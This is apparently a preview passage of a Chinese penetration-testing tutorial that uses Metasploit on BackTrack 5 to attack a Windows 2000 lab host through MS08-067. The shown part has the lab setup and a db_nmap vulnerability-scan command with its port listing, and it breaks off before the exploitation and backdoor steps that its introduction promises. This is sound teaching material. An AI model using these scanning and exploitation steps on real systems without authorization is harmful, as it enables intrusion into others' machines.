ms08_067-BT5渗透测试.docVIP

一个比较完整的metasploit基础资料。 本文包括使用Metasploit端口扫描，操作系统探测，漏洞检测，漏洞利用，开启后门的介绍 参考资料：BackTrack 4 Assuring Security by Penetration Testing 关于Metasploit的介绍我就不多说了，用百度搜索一下有很多 示范的漏洞是MS08-067,是一个比较老的漏洞了，系统也很老——Windows 2000 AdvancedSever。本文主要目的是为了介绍Metasploit的使用，MS08-067是一个比较容易成功的实例，所以就选择这个了。 ###################实验环境介绍#################### 被攻击主机： OS:Windows 2000 AdvancedServer IP:40 攻击者主机： OS:BT5 R1 IP:48 ##################入侵前的准备工作：端口扫描、漏洞检测################## 因需要用到db_nmap命令，查看当前的数据库连接状态 msf db_status postgresql connected to msf3 可以，看到当前已经连接到数据库postgresql msf db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 40 Nmap: Starting Nmap 5.51SVN ( ) at 2011-12-27 01:06 EST Nmap: Nmap scan report for 40 Nmap: Host is up (0.0023s latency). Nmap: Not shown: 970 closed ports Nmap: PORT STATE SERVICE VERSION Nmap: 25/tcp open smtp Microsoft ESMTP 5.0.2195.6713 Nmap: 42/tcp open wins Microsoft Windows Wins Nmap: 53/tcp open domain Microsoft DNS Nmap: 80/tcp open http Microsoft IIS httpd 5.0 Nmap: 88/tcp open kerberos-sec Microsoft Windows kerberos-sec Nmap: 119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok) Nmap: 135/tcp open msrpc Microsoft Windows RPC Nmap: 139/tcp open netbios-ssn Nmap: 389/tcp open ldap Nmap: 443/tcp open https? Nmap: 445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds Nmap: 464/tcp open kpasswd5? Nmap: 563/tcp open snews? Nmap: 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 Nmap: 636/tcp open tcpwrapped Nmap: 1026/tcp open msrpc Microsoft Windows RPC Nmap: 1029/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 Nmap: 1036/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe) Nmap: 1042/tcp open msrpc Microsoft Windows RPC Nmap: 1044/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe) Nmap: 1045/tcp open msrpc Mic